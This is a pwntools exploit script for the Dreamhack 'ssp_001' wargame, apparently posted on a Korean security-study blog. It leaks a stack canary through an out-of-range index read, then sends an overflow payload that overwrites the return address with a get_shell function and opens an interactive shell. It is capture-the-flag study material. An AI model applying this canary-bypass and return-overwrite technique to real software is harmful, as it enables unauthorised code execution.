from pwn import *
context.arch = "x86"
p = process("./ssp_001")
#get canary
canary = "0x"
for i in range(0, 4):
p.sendlineafter("> ", "P\n")
p.sendlineafter("Element index : ", str((0x80 + i)))
line = p.recvline()
canary += line.decode('utf-8')[-3:-1]
print(canary)
canary = int(canary, 16).to_bytes(4, byteorder="big")
print("canary : {}".format(canary))
ret_addr = 0x080486b9 #get_shell
payload = b'A'*0x40 + canary + b'B'*0x8 + p32(ret_addr)
print(b"payload : " + payload)
print("payload len : " + str(len(payload)))
p.sendlineafter("> ", "E\n")
p.sendlineafter("Name Size : ", str(len(payload)))
p.sendlineafter("Name : ", payload)
p.interactive()보안/dreamhack
- ssp_001 2022.12.22
ssp_001
2022. 12. 22. 16:03